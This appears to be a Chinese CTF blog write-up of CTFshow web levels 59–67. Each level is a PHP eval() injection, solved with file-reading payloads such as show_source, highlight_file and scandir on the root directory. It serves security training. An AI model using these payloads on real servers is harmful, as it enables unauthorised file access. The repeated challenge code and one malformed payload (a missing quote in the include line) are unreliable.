CTFshow web(php命令执行59-67)

                                                                        web59


/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: [email protected]
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);

payload:​c=show_source('flag.php');​ 

CTFshow web(php命令执行59-67)_第1张图片

我还是那句话:如果不知道对面过滤了啥,那就一个一个尝试

解释:在 PHP 中,show_source() 是一个内置函数,用于打开并显示指定文件的源代码。该函数接受一个文件名作为参数,并将该文件的内容以文本形式进行输出。

下面是我的文章对命令执行常用语句的总结:来源于:一篇文章带你进阶CTF命令执行-CSDN博客

我不想太多,一个个丢进去,看那个可以就是那个

CTFshow web(php命令执行59-67)_第2张图片

                                                                        web60


/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: [email protected]
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

这里还是上一个payload:

c=show_source('flag.php');

或者:c=highlight_file('flag.php');

CTFshow web(php命令执行59-67)_第3张图片

                                                                        web61


/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: [email protected]
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

这题是真的离谱,这个payload已经一路过关斩将了

c=show_source('flag.php');

当然得换个绕法:

c=include('flag.php);echo $flag;

CTFshow web(php命令执行59-67)_第4张图片这里是文件包含然后再输出变量

                                                                web62


/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: [email protected]
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错,又又又是那个payload,他还在输出!

c=show_source('flag.php');

CTFshow web(php命令执行59-67)_第5张图片

                                                                        web63


/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: [email protected]
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错,又又又是那个payload,他还在输出!

c=show_source('flag.php');

 CTFshow web(php命令执行59-67)_第6张图片

                                                                        web64


/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: [email protected]
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错,又又又是那个payload,他还在输出!

c=show_source('flag.php');

CTFshow web(php命令执行59-67)_第7张图片

                                                                        web65


/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: [email protected]
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错,又又又是那个payload,他还在输出!

c=show_source('flag.php');

                                                                        web66


/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: [email protected]
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

额,这波被制裁了,不能白嫖了,那就靠实力了!

CTFshow web(php命令执行59-67)_第8张图片

c=print_r(scandir("/"));

这里首先先翻看根目录,查看源代码,接着发现了flag.txtCTFshow web(php命令执行59-67)_第9张图片

c=highlight_file('/flag.txt');

知道flag在根目录下面的flag.txt直接访问就好了

CTFshow web(php命令执行59-67)_第10张图片

                                                                        web67


/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: [email protected]
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

还是上面那道题目的方法:

CTFshow web(php命令执行59-67)_第11张图片

payload:c=highlight_file('/flag.txt');

真诚希望我的文章能够帮助大家,谢谢!
 

你可能感兴趣的:(php,开发语言,CTFshow,web安全)